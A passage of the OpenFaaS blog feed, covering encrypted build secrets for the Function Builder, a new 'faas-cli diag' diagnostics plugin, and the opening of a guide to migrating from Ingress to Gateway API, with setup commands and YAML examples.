    <span class="na">handler</span><span class="pi">:</span> <span class="s">./sealed-test</span>
    <span class="na">image</span><span class="pi">:</span> <span class="s">ttl.sh/test-build-secrets/sealed-test:2h</span>
    <span class="na">build_secrets</span><span class="pi">:</span>
      <span class="na">api_key</span><span class="pi">:</span> <span class="s">sk-live-my-secret-key</span>
</code></pre></div></div>

<h3 id="build-with-the-remote-builder">Build with the remote builder</h3>

<p>If you don’t already have the payload secret file locally, fetch it from the cluster:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">export </span><span class="nv">PAYLOAD</span><span class="o">=</span><span class="si">$(</span>kubectl get secret <span class="nt">-n</span> openfaas payload-secret <span class="se">\</span>
  <span class="nt">-o</span> <span class="nv">jsonpath</span><span class="o">=</span><span class="s1">'{.data.payload-secret}'</span> | <span class="nb">base64</span> <span class="nt">--decode</span><span class="si">)</span>
<span class="nb">echo</span> <span class="nv">$PAYLOAD</span> <span class="o">&gt;</span> payload.txt
</code></pre></div></div>

<p>If you don’t have the public key file, fetch it from the builder:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-s</span> http://127.0.0.1:8081/publickey | jq <span class="nt">-r</span> <span class="s1">'.public_key'</span> <span class="o">&gt;</span> key.pub
</code></pre></div></div>

<p>Then publish:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli publish <span class="se">\</span>
  <span class="nt">-f</span> stack.yaml <span class="se">\</span>
  <span class="nt">--remote-builder</span> http://127.0.0.1:8081 <span class="se">\</span>
  <span class="nt">--payload-secret</span> ./payload.txt <span class="se">\</span>
  <span class="nt">--builder-public-key</span> ./key.pub
</code></pre></div></div>

<p>The secrets are encrypted by <code class="language-plaintext highlighter-rouge">faas-cli</code> before sending. You’ll see the build logs streamed back:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[0] &gt; Building sealed-test.
Building: ttl.sh/test-build-secrets/sealed-test:2h with dockerfile template. Please wait..
2026-03-24T11:15:13Z [stage-1 2/4] COPY --from=watchdog /fwatchdog /usr/bin/fwatchdog
2026-03-24T11:15:13Z [stage-1 3/4] RUN mkdir -p /home/app
2026-03-24T11:15:13Z [stage-1 4/4] RUN --mount=type=secret,id=api_key ...
2026-03-24T11:15:14Z exporting to image
sealed-test success building and pushing image: ttl.sh/test-build-secrets/sealed-test:2h
</code></pre></div></div>

<h3 id="verify-1">Verify</h3>

<p>Run the image and invoke the watchdog:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker run <span class="nt">--rm</span> <span class="nt">-d</span> <span class="nt">-p</span> 8081:8080 <span class="nt">--name</span> sealed-test <span class="se">\</span>
  ttl.sh/test-build-secrets/sealed-test:2h

curl <span class="nt">-s</span> http://127.0.0.1:8081

docker stop sealed-test
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sk-live-my-secret-key
</code></pre></div></div>

<p>The secret was encrypted on the client, sent over the wire inside the build tar, decrypted by the builder, and mounted into the Dockerfile during the build.</p>

<h3 id="a-real-world-example-private-pypi-registry">A real-world example: private PyPI registry</h3>

<p>In production, you’d use this to pass credentials for private package registries. Here’s what that would look like for a Python function using the <code class="language-plaintext highlighter-rouge">python3-http</code> template.</p>

<p>In your <code class="language-plaintext highlighter-rouge">stack.yaml</code>:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">functions</span><span class="pi">:</span>
  <span class="na">data-processor</span><span class="pi">:</span>
    <span class="na">lang</span><span class="pi">:</span> <span class="s">python3-http</span>
    <span class="na">handler</span><span class="pi">:</span> <span class="s">./data-processor</span>
    <span class="na">image</span><span class="pi">:</span> <span class="s">registry.example.com/data-processor:latest</span>
    <span class="na">build_secrets</span><span class="pi">:</span>
      <span class="na">pip_index_url</span><span class="pi">:</span> <span class="s">https://token:pypi-secret@my-org.jfrog.io/artifactory/api/pypi/python-local/simple</span>
</code></pre></div></div>

<p>Then in the template’s Dockerfile, you’d change the <code class="language-plaintext highlighter-rouge">pip install</code> line to mount the secret:</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gd">-RUN pip install --no-cache-dir --user -r requirements.txt
</span><span class="gi">+RUN --mount=type=secret,id=pip_index_url \
+    pip install --no-cache-dir --user \
+    --index-url "$(cat /run/secrets/pip_index_url)" \
+    -r requirements.txt
</span></code></pre></div></div>

<p>The same pattern works for npm, Go private modules, or any package manager that takes credentials at install time.</p>
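<p>For npm, for instance, one approach is to seal an entire <code class="language-plaintext highlighter-rouge">.npmrc</code> containing the registry token and mount it directly where npm expects it. This is a hedged sketch: the secret id <code class="language-plaintext highlighter-rouge">npmrc</code> is an assumption, sealed from a file with <code class="language-plaintext highlighter-rouge">--from-file</code>:</p>

```dockerfile
# Sketch only: assumes a secret sealed with
#   faas-cli secret seal key.pub --from-file npmrc=./.npmrc
# BuildKit's target option mounts the file where npm looks for its config,
# so the token is available for this step but never lands in an image layer.
RUN --mount=type=secret,id=npmrc,target=/root/.npmrc \
    npm ci --omit=dev
```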

<p>Binary values like CA certificates are also supported. You can seal them from files instead of literals:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli secret seal key.pub <span class="se">\</span>
  <span class="nt">--from-file</span> ca.crt<span class="o">=</span>./certs/internal-ca.crt <span class="se">\</span>
  <span class="nt">--from-literal</span> <span class="nv">pip_index_url</span><span class="o">=</span>https://token:secret@registry.example.com/simple
</code></pre></div></div>

<h2 id="sealing-secrets-for-ci-pipelines">Sealing secrets for CI pipelines</h2>

<p>If you’re integrating with a CI system rather than using <code class="language-plaintext highlighter-rouge">faas-cli publish</code> directly, you can seal secrets into a file ahead of time:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli secret seal key.pub <span class="se">\</span>
  <span class="nt">--from-literal</span> <span class="nv">api_key</span><span class="o">=</span>sk-live-my-secret-key
</code></pre></div></div>

<p>This writes <code class="language-plaintext highlighter-rouge">com.openfaas.secrets</code> in the current directory. Include it in the build tar alongside <code class="language-plaintext highlighter-rouge">com.openfaas.docker.config</code> and the <code class="language-plaintext highlighter-rouge">context/</code> folder, and the builder will pick it up.</p>
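<p>A sketch of how a CI pipeline might assemble that tar, following the layout described above — the directory layout and file contents here are placeholders, not real build inputs:</p>

```shell
# Assemble a build tar with the sealed secrets alongside the other inputs.
# File names follow the layout described above; contents are placeholders.
mkdir -p build/context
echo '{}' > build/com.openfaas.docker.config
touch build/com.openfaas.secrets   # produced by: faas-cli secret seal
tar -C build -cvf req.tar com.openfaas.docker.config com.openfaas.secrets context
tar -tf req.tar
```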

<p>You can inspect a sealed file without the builder:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli secret unseal key
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>api_key=sk-live-my-secret-key
</code></pre></div></div>

<h2 id="new-faas-cli-commands">New faas-cli commands</h2>

<p>We’ve added four new subcommands to <code class="language-plaintext highlighter-rouge">faas-cli secret</code>:</p>

<table>
  <thead>
    <tr>
      <th>Command</th>
      <th>Purpose</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">faas-cli secret keygen</code></td>
      <td>Generate a Curve25519 keypair</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">faas-cli secret generate</code></td>
      <td>Generate a random secret value for the pro-builder’s HMAC signing key</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">faas-cli secret seal key.pub --from-literal k=v</code></td>
      <td>Seal secrets into <code class="language-plaintext highlighter-rouge">com.openfaas.secrets</code></td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">faas-cli secret unseal key</code></td>
      <td>Decrypt and inspect a sealed file (requires access to the private key)</td>
    </tr>
  </tbody>
</table>

<h2 id="wrapping-up">Wrapping up</h2>

<p>Build secrets for local builds and CI have been available for a while via <code class="language-plaintext highlighter-rouge">faas-cli pro build</code>. This feature brings the same capability to the Function Builder API, where builds happen in-cluster on behalf of third-party users and the secrets need to be protected over the wire.</p>

<p>We developed this together with <a href="https://waylay.io">Waylay</a> based on their production requirements, using NaCl box encryption to protect secrets over the wire. The <code class="language-plaintext highlighter-rouge">seal</code> package in the <a href="https://github.com/openfaas/go-sdk">Go SDK</a> is generic and could be reused for other use-cases in the future.</p>

<p>If you’re already using the Function Builder, you can start using build secrets by upgrading the helm chart and <code class="language-plaintext highlighter-rouge">faas-cli</code>. If you’re new to the builder, see the <a href="https://docs.openfaas.com/openfaas-pro/builder/">Function Builder API docs</a> for the full setup guide.</p>

<p>If you have questions, feel free to <a href="https://openfaas.com/pricing">reach out to us</a>.</p>

<h3 id="see-also">See also</h3>

<ul>
  <li><a href="https://docs.openfaas.com/openfaas-pro/builder/">Function Builder API docs</a></li>
  <li><a href="https://github.com/openfaas/go-sdk/tree/master/seal">Go SDK <code class="language-plaintext highlighter-rouge">seal</code> package</a></li>
  <li><a href="https://github.com/openfaas/faas-netes/tree/master/chart/pro-builder">Pro-builder Helm chart</a></li>
  <li><a href="https://www.openfaas.com/blog/building-functions-via-api-golang/">How to Build Functions with the Go SDK for OpenFaaS</a></li>
</ul>]]></content><author><name>OpenFaaS Ltd</name></author><category term="kubernetes" /><category term="faas" /><category term="functions" /><category term="builder" /><category term="enterprise" /><summary type="html"><![CDATA[Learn how to pass private registry tokens and credentials into the Function Builder, encrypted end-to-end.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://www.openfaas.com/images/2026-03-build-secrets/background.png" /><media:content medium="image" url="https://www.openfaas.com/images/2026-03-build-secrets/background.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">Introducing: Painless support and hands-off architecture reviews</title><link href="https://www.openfaas.com/blog/painless-support-with-diag/" rel="alternate" type="text/html" title="Introducing: Painless support and hands-off architecture reviews" /><published>2026-03-13T00:00:00+00:00</published><updated>2026-03-13T00:00:00+00:00</updated><id>https://www.openfaas.com/blog/painless-support-with-diag</id><content type="html" xml:base="https://www.openfaas.com/blog/painless-support-with-diag/"><![CDATA[<p>Learn how the new <code class="language-plaintext highlighter-rouge">diag</code> plugin for faas-cli can be used to diagnose issues and make architecture reviews a hands-off exercise.</p>

<p>It helps you (or us together) to answer two questions: What’s breaking? Are we using OpenFaaS to its full potential?</p>

<p><img src="/images/2026-03-diag/e2e_flow.png" alt="End-to-end flow for faas-cli diag" /></p>

<blockquote>
  <p>Diag builds an HTML report, an instructions file for AI agents, graphs, and visualisations so you can explore the data and share it if you need help. One command, no manual steps, nothing to forget.</p>
</blockquote>

<h2 id="two-case-studies">Two case-studies</h2>

<p><strong>Misconfiguration leads to an outage in production</strong></p>

<p>An enterprise customer using OpenFaaS for 3 years accidentally changed their gateway’s timeout to 0.5s from 2 hours.</p>

<blockquote>
  <p>An inadvertent change to values.yaml on the customer’s end enforced a half-second timeout, causing functions to time out unexpectedly. We requested a “diag” run, and within 30 minutes we had found the issue, advised the team, and got them up and running again.</p>
</blockquote>

<p><strong>It’s always DNS. Actually it was a bad node in EKS.</strong></p>

<p>A defense contractor in the US that uses OpenFaaS for building AI analytics software started to complain of timeouts and reliability issues in production.</p>

<blockquote>
  <p>We sent them the troubleshooting guide, and said “Can you try these?” After a couple of weeks, they’d not run any of the commands, so we sent them specific commands. They ran these and shared the output. It was helpful, but we needed more.</p>

  <p>We then went down the route of trying to reproduce the issue locally, and couldn’t. We told the team to try HTTP readiness probes, which sometimes cure this kind of issue.</p>

  <p>Eventually, after sending commands back and forth over the course of a few days, they sent over a “diag” run.</p>

  <p>We saw network timeouts between core Pods like NATS, the Gateway and Prometheus. Even between containers in the same Pod. The insights helped them track it down to an EKS node that had “gone bad” and needed replacement.</p>
</blockquote>

<h2 id="two-main-uses-cases">Two main use-cases</h2>

<p><strong>Self-service, and pain-free support</strong></p>

<p>When something goes wrong in production, the last thing you want is to be sent to a troubleshooting guide and told to run half a dozen commands. Your product is on fire. People are starting to point the finger of blame. You just want it fixed.</p>

<p>Everything that could be relevant is collected: deployments, function definitions, logs, events, pod status, and Prometheus metrics. Run it, send us the archive, and we can start working on your issue immediately, without a back-and-forth asking you to gather more data.</p>

<p><strong>Architecture review and value extraction</strong></p>

<p>Beyond troubleshooting, the data and graphs collected by <code class="language-plaintext highlighter-rouge">faas-cli diag</code> can help you answer broader questions about your setup: are you getting the <em>most value possible</em> from the product? Is there an OpenFaaS feature that could help with your type of workload? Is there a production incident waiting to happen because something’s been mixed up in the <code class="language-plaintext highlighter-rouge">values.yaml</code>?</p>

<p>The report generated by diag gives you a starting point. You can inspect invocation rates, error rates, replica counts, and resource usage without needing to set up dashboards or port-forward to Prometheus.</p>

<p>Reviews no longer have to be annual ceremonies.</p>

<h2 id="what-does-it-collect">What does it collect?</h2>

<p>The diag tool gathers the following from your cluster:</p>

<ul>
  <li><strong>Deployment YAMLs</strong> — exported specs for OpenFaaS core components and functions</li>
  <li><strong>Function CRs</strong> — Custom Resource definitions for deployed functions</li>
  <li><strong>Kubernetes events</strong> — cluster events from the OpenFaaS and function namespaces</li>
  <li><strong>Pod status</strong> — output from <code class="language-plaintext highlighter-rouge">kubectl get</code> and <code class="language-plaintext highlighter-rouge">kubectl describe</code> for all relevant pods</li>
  <li><strong>Container logs</strong> — streamed via <a href="https://github.com/stern/stern">stern</a> for real-time and retrospective log collection</li>
  <li><strong>Node info</strong> — inventory and descriptions for all cluster nodes</li>
  <li><strong>Helm values</strong> — user-supplied values for the OpenFaaS Helm release</li>
  <li><strong>Ingress &amp; Gateway API</strong> — Ingress, IngressClass, HTTPRoute, and GatewayClass resources</li>
  <li><strong>Network Policies</strong> — NetworkPolicy resources from OpenFaaS and function namespaces</li>
  <li><strong>Prometheus metrics</strong> — metrics snapshots and visualisations covering replicas, request rates, latencies, and resource usage</li>
</ul>

<p>All collected data is written to a local directory and archived into a <code class="language-plaintext highlighter-rouge">.tar.gz</code> file for easy sharing. The tool is 100% offline — no information is shared with anyone, including OpenFaaS Ltd, by default.</p>

<h2 id="install-the-diag-plugin">Install the diag plugin</h2>

<p>Install the plugin, and check the version. It’s useful to run this command before every run, because we’re actively improving the tool as we get feedback.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli plugin get diag
faas-cli diag version
</code></pre></div></div>

<h2 id="generate-a-report">Generate a report</h2>

<p>By default, <code class="language-plaintext highlighter-rouge">diag</code> reads configuration from <code class="language-plaintext highlighter-rouge">diag.yaml</code> in your current directory. Generate that file first, then run the tool:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Generate a `diag.yaml` config file</span>
faas-cli diag config simple <span class="o">&gt;</span> diag.yaml

<span class="c"># Run diagnostics</span>
faas-cli diag
</code></pre></div></div>

<p>The first command creates a <code class="language-plaintext highlighter-rouge">diag.yaml</code> with sensible defaults that work for most setups. The second starts the collection: it sets up port-forwards, streams logs, collects Kubernetes resources, and scrapes Prometheus metrics. Press <code class="language-plaintext highlighter-rouge">Control+C</code> once to stop gracefully; it will finish collecting and write all output to disk.</p>

<p><strong>Staging and production</strong></p>

<p>Here’s how you could collect data from both production and staging:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">mkdir</span> ~/diag
<span class="nb">cd</span> ~/diag

<span class="c"># Generate an initial config:</span>
faas-cli diag config simple <span class="o">&gt;</span> diag.yaml

kubectl config use-context eks-staging-us-east-1
faas-cli diag <span class="s2">"staging"</span>

kubectl config use-context eks-prod-us-east-1
faas-cli diag <span class="s2">"prod"</span>
</code></pre></div></div>

<p>For more advanced options like targeting specific functions or using an external Prometheus instance, see the <a href="#appendix-full-configuration-reference">full configuration reference</a> at the end of this post.</p>

<p><strong>Running at scale with hundreds of namespaces</strong></p>

<p>If you’re running a multi-tenant setup with hundreds of function namespaces, you probably don’t want to collect from all of them at once. Use the <code class="language-plaintext highlighter-rouge">--namespace</code> flag to target a specific subset:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli diag config simple <span class="nt">--namespace</span> tenant-1 <span class="nt">--namespace</span> tenant-2
</code></pre></div></div>

<p>Or use <code class="language-plaintext highlighter-rouge">'*'</code> to automatically discover all OpenFaaS function namespaces:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli diag config simple <span class="nt">--namespace</span> <span class="s1">'*'</span>
</code></pre></div></div>
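
<p>The <code class="language-plaintext highlighter-rouge">'*'</code> here, like the function filter patterns in the appendix (e.g. <code class="language-plaintext highlighter-rouge">'api-*'</code>), is a shell-style glob. As an illustration of how such patterns behave — using the shell’s own <code class="language-plaintext highlighter-rouge">case</code> matching, so the plugin’s exact matching rules may differ:</p>

```shell
# Illustrative glob matching using the shell's own pattern syntax;
# the diag plugin's exact matching rules may differ.
matches() {
  case "$2" in
    $1) echo "match" ;;
    *)  echo "no match" ;;
  esac
}
matches 'tenant-*' 'tenant-1'    # match
matches 'tenant-*' 'openfaas-fn' # no match
matches '*' 'anything'           # match
```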

<script src="https://asciinema.org/a/tsVGRdQhWh7p32hp.js" id="asciicast-tsVGRdQhWh7p32hp" async="true" data-autoplay="true" data-loop="true"></script>

<h2 id="exploring-the-report">Exploring the report</h2>

<p>Data is saved to <code class="language-plaintext highlighter-rouge">./run</code> - either with a date and timestamp, or with the name of the run you passed.</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">diag "prod"</code> creates <code class="language-plaintext highlighter-rouge">./run/prod/</code></li>
  <li><code class="language-plaintext highlighter-rouge">diag</code> on its own creates a timestamped folder, e.g. <code class="language-plaintext highlighter-rouge">./run/2026-03-10_14-30-00/</code></li>
</ul>

<p>To explore the data, you can open the <code class="language-plaintext highlighter-rouge">index.html</code> file in those folders.</p>

<p>The report includes visualisations of Prometheus metrics such as function invocation rates, error rates, and replica counts, giving you a quick overview of cluster health without needing to set up Grafana or port-forward to Prometheus yourself.</p>

<p><img src="/images/2026-03-diag/report-summary.png" alt="The report summary page with quick links to metrics, CRDs, pods, events, and logs per namespace." /></p>
<blockquote>
  <p>The report summary page with quick links to metrics, CRDs, pods, events, and logs per namespace.</p>
</blockquote>

<p><img src="/images/2026-03-diag/report-metrics-dashboard.png" alt="The metrics dashboard showing function replicas, request rates by status code, and execution duration." /></p>
<blockquote>
  <p>The metrics dashboard showing function replicas, request rates by status code, and execution duration.</p>
</blockquote>

<p><strong>Diag is AI ready</strong></p>

<p>The output also includes an <code class="language-plaintext highlighter-rouge">AGENTS.md</code> file that instructs AI coding agents like Claude Code, Codex, and similar tools to interpret and diagnose issues from the collected data. This gives you a fast first pass for support investigations or architecture reviews using AI, while keeping the decision loop with your team.</p>

<p>But before you load up Claude Code, Codex, or Gemini, make sure that your organisation has at least one of the following in place:</p>

<ul>
  <li>A zero-data retention agreement with your inference provider.</li>
  <li>Your own private deployment of a model to Azure/AWS/Google etc, with approved data policies.</li>
  <li>Access to private, airgapped local GPUs and AI models.</li>
  <li>Redacted output, with all credentials, tokens, customer identifiers, and confidential information removed.</li>
</ul>

<p>If in doubt, do not use any form of AI with the output; most issues can be found by humans on your end or ours.</p>

<h2 id="useful-flags-and-options">Useful flags and options</h2>

<table>
  <thead>
    <tr>
      <th>Flag / Command</th>
      <th>Description</th>
      <th>Example</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">-d/--duration</code></td>
      <td>Auto-stop after a set duration</td>
      <td><code class="language-plaintext highlighter-rouge">faas-cli diag -d 5m</code></td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">--age</code></td>
      <td>Collect logs from a past time window</td>
      <td><code class="language-plaintext highlighter-rouge">faas-cli diag --age 1h</code></td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">diag [run-name]</code></td>
      <td>Custom name for the run (positional argument)</td>
      <td><code class="language-plaintext highlighter-rouge">faas-cli diag incident-456</code></td>
    </tr>
  </tbody>
</table>

<h2 id="wrapping-up">Wrapping up</h2>

<p>The new <code class="language-plaintext highlighter-rouge">faas-cli diag</code> plugin gives you a fast, repeatable way to collect everything needed for support requests and architecture reviews. Instead of manually running a dozen <code class="language-plaintext highlighter-rouge">kubectl</code> commands, you get a single workflow that captures logs, events, pod status, and metrics — all archived and ready to share.</p>

<p>Whether you’re debugging an incident or reviewing your cluster setup, the workflow is the same: run <code class="language-plaintext highlighter-rouge">faas-cli diag</code> and explore the report. If you need our help, send us the archive.</p>

<p>For more details, see the <a href="https://docs.openfaas.com/deployment/troubleshooting/">Troubleshooting docs</a>.</p>

<h2 id="appendix-full-configuration-reference">Appendix: full configuration reference</h2>

<p>Generate the full configuration template with:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli diag config full
</code></pre></div></div>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Identify the cluster and kubectl context</span>
<span class="na">clusterName</span><span class="pi">:</span> <span class="s2">"</span><span class="s">production-cluster"</span>
<span class="na">context</span><span class="pi">:</span> <span class="s2">"</span><span class="s">"</span>  <span class="c1"># Leave empty to use current context</span>

<span class="c1"># Namespaces to collect from</span>
<span class="na">namespaces</span><span class="pi">:</span>
  <span class="na">openfaas</span><span class="pi">:</span> <span class="s">openfaas</span>
  <span class="na">functions</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="s">openfaas-fn</span>
    <span class="pi">-</span> <span class="s">staging-fn</span>
    <span class="pi">-</span> <span class="s">production-fn</span>

<span class="c1"># Function filter patterns (glob-style)</span>
<span class="na">functions</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="s1">'</span><span class="s">api-*'</span>
  <span class="pi">-</span> <span class="s1">'</span><span class="s">webhook-*'</span>

<span class="c1"># Prometheus configuration</span>
<span class="na">prometheus</span><span class="pi">:</span>
  <span class="na">enabled</span><span class="pi">:</span> <span class="no">true</span>
  <span class="na">service</span><span class="pi">:</span> <span class="s">prometheus</span>
  <span class="na">targetPort</span><span class="pi">:</span> <span class="m">9090</span>
  <span class="c1"># Use a custom URL if Prometheus is outside the openfaas namespace</span>
  <span class="c1"># url: "http://prometheus.monitoring.svc.cluster.local:9090"</span>

<span class="c1"># Gateway configuration</span>
<span class="na">gateway</span><span class="pi">:</span>
  <span class="na">enabled</span><span class="pi">:</span> <span class="no">true</span>
  <span class="na">service</span><span class="pi">:</span> <span class="s">gateway</span>
  <span class="na">targetPort</span><span class="pi">:</span> <span class="m">8080</span>
  <span class="na">autoAuth</span><span class="pi">:</span> <span class="no">true</span>

<span class="c1"># What to collect</span>
<span class="na">collection</span><span class="pi">:</span>
  <span class="na">deployments</span><span class="pi">:</span> <span class="no">true</span>
  <span class="na">functionCRs</span><span class="pi">:</span> <span class="no">true</span>
  <span class="na">events</span><span class="pi">:</span> <span class="no">true</span>
  <span class="na">podStatus</span><span class="pi">:</span> <span class="no">true</span>
  <span class="na">logs</span><span class="pi">:</span> <span class="no">true</span>
  <span class="na">metrics</span><span class="pi">:</span> <span class="no">true</span>
  <span class="na">logAge</span><span class="pi">:</span> <span class="s2">"</span><span class="s">1h"</span>

<span class="c1"># Output directory and run name</span>
<span class="na">output</span><span class="pi">:</span>
  <span class="na">directory</span><span class="pi">:</span> <span class="s2">"</span><span class="s">./run"</span>
  <span class="c1"># runName: "incident-123"</span>
</code></pre></div></div>

<p>A few options worth noting:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">context</code> - lets you target a specific kubectl context if you manage multiple clusters. Leave it empty to use whichever context is currently active.</li>
  <li><code class="language-plaintext highlighter-rouge">functions</code> - uses glob patterns to filter which functions are collected. Use <code class="language-plaintext highlighter-rouge">'*'</code> for all, or patterns like <code class="language-plaintext highlighter-rouge">'api-*'</code> to narrow the scope on large clusters.</li>
  <li><code class="language-plaintext highlighter-rouge">prometheus.url</code> - lets you point to an external Prometheus instance, bypassing the automatic port-forward.</li>
  <li><code class="language-plaintext highlighter-rouge">collection</code> - toggles to disable individual collectors if you only need a subset of the data.</li>
  <li><code class="language-plaintext highlighter-rouge">logAge</code> - controls how far back to collect logs retrospectively. Leave it empty to collect all available logs.</li>
</ul>]]></content><author><name>OpenFaaS Ltd</name></author><category term="kubernetes" /><category term="troubleshooting" /><category term="openfaas-pro" /><summary type="html"><![CDATA[Run one command to collect an OpenFaaS cluster report: logs, resources, events, and metrics that you can share for quick help]]></summary></entry><entry><title type="html">How to Migrate OpenFaaS to Gateway API</title><link href="https://www.openfaas.com/blog/gateway-api-migration/" rel="alternate" type="text/html" title="How to Migrate OpenFaaS to Gateway API" /><published>2026-02-13T00:00:00+00:00</published><updated>2026-02-13T00:00:00+00:00</updated><id>https://www.openfaas.com/blog/gateway-api-migration</id><content type="html" xml:base="https://www.openfaas.com/blog/gateway-api-migration/"><![CDATA[<p>In this post we’ll walk through the current options for getting traffic into OpenFaaS on Kubernetes, the latest Gateway API, and how to migrate from Ingress.</p>

<p>Table of contents:</p>

<ul>
  <li><a href="#preamble-the-unfortunate-double-whammy">Preamble: The unfortunate double-whammy</a></li>
  <li><a href="#introduction-to-gateway-api">Introduction to Gateway API</a></li>
  <li><a href="#prerequisites">Prerequisites</a></li>
  <li><a href="#check-and-update-gateway-api-crds">Check and update Gateway API CRDs</a></li>
  <li><a href="#install-a-gateway-api-implementation">Install a Gateway API Implementation</a></li>
  <li><a href="#install-cert-manager">Install cert-manager</a></li>
  <li><a href="#create-a-cert-manager-issuer">Create a cert-manager Issuer</a></li>
  <li><a href="#expose-the-openfaas-gateway-with-tls">Expose the OpenFaaS gateway with TLS</a></li>
  <li><a href="#add-the-openfaas-dashboard">Add the OpenFaaS dashboard</a></li>
  <li><a href="#final-thoughts-and-next-steps">Final thoughts and next steps</a></li>
</ul>

<h2 id="preamble-the-unfortunate-double-whammy">Preamble: The unfortunate double-whammy</h2>

<p>For as long as we can remember, Ingress has been the de facto standard for exposing HTTP services from Kubernetes clusters. It has always had a very simple syntax, and has only gone through one major change, graduating from <code class="language-plaintext highlighter-rouge">extensions/v1beta1</code> to <code class="language-plaintext highlighter-rouge">networking.k8s.io/v1</code> in Kubernetes 1.19 (released in 2020). The key changes were the introduction of the <code class="language-plaintext highlighter-rouge">pathType</code> field for precise path matching, and the <code class="language-plaintext highlighter-rouge">IngressClass</code> resource, which replaced annotations for selecting a controller.</p>
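
<p>As a refresher, a minimal <code class="language-plaintext highlighter-rouge">networking.k8s.io/v1</code> Ingress using both of those fields might look like the sketch below for the OpenFaaS gateway (the hostname and class name are placeholders):</p>

```yaml
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: openfaas-gateway
  namespace: openfaas
spec:
  # ingressClassName replaces the old kubernetes.io/ingress.class annotation
  ingressClassName: nginx
  rules:
  - host: gw.example.com
    http:
      paths:
      - path: /
        # pathType was introduced when Ingress graduated to v1
        pathType: Prefix
        backend:
          service:
            name: gateway
            port:
              number: 8080
```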

<p>Honestly, we don’t need to explain how Ingress works; it’s so well understood and widely used.</p>

<p>But there was a glint in the eyes of the Kubernetes maintainers, and they wanted to provide something much more ambitious in scope, addressing needs that OpenFaaS customers don’t tend to have. The <a href="https://istio.io/">Istio service mesh</a>, with its own set of similarly-named add-ons, was a precursor for this ambition, which eventually crystallised into the <em>Gateway API</em>.</p>

<p>Most OpenFaaS and Inlets customers we’ve encountered have been using Ingress (many moved away from Istio and service meshes), preferring simplicity and ease of use, and almost always with the <a href="https://kubernetes.github.io/ingress-nginx/">ingress-nginx</a> controller. A brief history: ingress-nginx started off as a hobby project for a single maintainer, who was unable to find corporate sponsorship or support from the CNCF, and had to give it up in 2019. Shortly after, two or three maintainers stepped up and ran it reasonably well as a spare-time project, but without sustainable backing as part of a day job, the same thing started to happen again. Issues were being reported faster than they could be fixed.</p>

<p>So the Kubernetes maintainers made a judgement call: they announced that the project would be officially mothballed in March 2026, with no further updates or security patches. That’s a big deal.</p>

<p><strong>Why is this a double whammy?</strong></p>

<p>The announcement had some choice words: “if you must continue to use Ingress” - which sounds a bit like you’re in the wrong for using something that fits your needs. It has an undertone of Ingress being a legacy or inappropriate solution, something that may eventually go the way of ingress-nginx. We focus on simple solutions that work well for our users; however, reading between the lines, we want to make sure you’re prepared for the future.</p>

<p><strong>So if we’re pragmatic, we have a couple of options:</strong></p>

<ol>
  <li>try to move to an Ingress Controller like Traefik which can support some of the behaviours and settings of Ingress Nginx,</li>
  <li>or move to Gateway API (the developing, but approved future standard).</li>
</ol>

<p>Rather than installing one chart, creating a basic Ingress resource, and adding one or two annotations, we now have a much more varied path. Gateway API intends to provide a vendor-agnostic overlay, shying away from annotations as an extension mechanism, and focusing on a new set of decoupled API objects.</p>

<p><strong>It’s only a bit of YAML, how hard could it be?</strong></p>

<p>For OpenFaaS customers, we’re trying to make this transition as simple as possible, starting with this guide, which converts the YAML like-for-like. But one of our other products, <a href="https://docs.inlets.dev/uplink/">Inlets Uplink</a>, integrates ingress-nginx much more deeply and relies on its annotations; that migration is going to be significantly more work, both for the controller itself and for users needing to upgrade.</p>

<p><strong>Gateways everywhere</strong></p>

<p>The core of OpenFaaS is the OpenFaaS Gateway. This was created in 2016 and has nothing to do with the Gateway API for Kubernetes. Unfortunately, the terms are overloaded, so many of you will end up with “openfaas-gateway” (Gateway API object) and a “gateway” (Service object for the OpenFaaS Gateway), and both may well be in the OpenFaaS namespace.</p>

<p>We’re sorry, there’s not much we could do about this, but if you can think of a better name or a more descriptive term, we would appreciate your input.</p>

